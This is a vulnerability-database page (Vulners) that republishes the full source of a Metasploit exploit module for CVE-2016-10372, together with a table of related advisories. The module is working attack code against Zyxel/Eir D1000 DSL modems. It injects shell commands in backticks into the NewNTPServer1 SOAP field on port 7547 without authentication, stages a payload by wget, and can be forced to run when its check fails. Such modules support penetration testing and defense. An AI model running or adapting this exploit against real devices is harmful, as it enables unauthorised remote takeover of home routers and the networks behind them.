Vulners
Lucene search
Zyxel/Eir D1000 DSL Modem NewNTPServer Command Injection Over TR-064
🗓️ 02 Dec 2016 14:49:21Reported by Kenzo, Michael Messner <[email protected]>, todb <[email protected]>, wvu <[email protected]>, 0x27Type 
metasploit🔗 www.rapid7.com👁 79 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | The vulnerability of the Zyxel Eir D1000 router’s microprogramming software, related to deficiencies in access control for the TR-064 protocol, allows a intruder to execute arbitrary commands. | 11 Oct 201700:00 | – | bdu_fstec |
 | CVE-2016-10372 | 29 May 201815:50 | – | circl |
 | Eir D1000 Arbitrary Command Execution Vulnerability | 18 May 201700:00 | – | cnvd |
 | CVE-2016-10372 | 16 May 201714:00 | – | cve |
 | CVE-2016-10372 | 16 May 201714:00 | – | cvelist |
 | CVE-2016-10372 | 16 May 201714:29 | – | nvd |
 | Eir D1000 Modem CWMP Remote Command Execution | 11 Nov 201600:00 | – | openvas |
 | Design/Logic Flaw | 16 May 201714:29 | – | prion |
 | PT-2016-3182 · Eir · Eir D1000 | 7 Oct 201600:00 | – | ptsecurity |
 | VulnCheck KEV: CVE-2016-10372 | 14 Dec 201600:00 | – | vulncheck_kev |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Zyxel/Eir D1000 DSL Modem NewNTPServer Command Injection Over TR-064',
'Description' => %q{
Broadband DSL modems manufactured by Zyxel and distributed by some
European ISPs are vulnerable to a command injection vulnerability when setting
the 'NewNTPServer' value using the TR-64 SOAP-based configuration protocol. In
the tested case, no authentication is required to set this value on affected
DSL modems.
This exploit was originally tested on firmware versions up to 2.00(AADU.5)_20150909.
},
'Author' =>
[
'Kenzo', # Vulnerability discovery and original Metasploit module
'Michael Messner <devnull[at]s3cur1ty.de>', # Copypasta from TheMoon msf module, payload help
'todb', # Metasploit module
'wvu' , # Metasploit module
'0x27' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-10372' ],
[ 'EDB', '40740' ],
[ 'URL', 'https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/'],
[ 'URL', 'https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759'],
[ 'URL', 'https://broadband-forum.org/technical/download/TR-064.pdf']
],
'DisclosureDate' => '2016-11-07',
'Privileged' => true,
'Targets' =>
[
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
],
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
],
'DefaultTarget' => 0,
'DefaultOptions' => {'WfsDelay' => 10}
))
register_options(
[
Opt::RPORT(7547), # TR-064 CWMP port for SOAP/XML commands
OptBool::new('FORCE_EXPLOIT', [false, 'Force an attempt even if the check fails', nil])
])
end
def set_new_ntp_server(cmd)
template = "<?xml version=\"1.0\"?>"
template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
template << " <SOAP-ENV:Body>"
template << " <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
template << " <NewNTPServer1>`%s`</NewNTPServer1>" # Backticks, aw yeah
template << " <NewNTPServer2></NewNTPServer2>"
template << " <NewNTPServer3></NewNTPServer3>"
template << " <NewNTPServer4></NewNTPServer4>"
template << " <NewNTPServer5></NewNTPServer5>"
template << " </u:SetNTPServers>"
template << " </SOAP-ENV:Body>"
template << "</SOAP-ENV:Envelope>"
template % cmd
end
def execute_command(cmd, opts)
uri = '/UD/act?1'
soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
injected_data = set_new_ntp_server(cmd)
begin
res = send_request_cgi({
'uri' => uri,
'ctype' => "text/xml",
'method' => 'POST',
'headers' => {
'SOAPAction' => soapaction,
},
'data' => injected_data
}, 2)
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => '/globe'
})
rescue ::Rex::ConnectionError
vprint_error("#{peer} - A connection error has occurred")
return Exploit::CheckCode::Unknown
end
if res and res.code == 404 and res.body =~ /home_wan\.htm/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def inject_staged_data
execute_cmdstager(flavor: :wget, linemax: 65, delay: 3)
end
def exploit
print_status("#{peer} - Checking...")
if check == Exploit::CheckCode::Appears
print_status("#{peer} - Appears vulnerable")
inject_staged_data
elsif datastore['FORCE_EXPLOIT']
print_status("#{peer} - Doesn't appear vulnerable, but trying anyway.")
inject_staged_data
else
fail_with(Failure::Unknown, "#{peer} - Failed to access the device")
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Nov 2018 18:18Current
7.7High risk
Vulners AI Score7.7
CVSS 210
CVSS 39.8
EPSS0.81899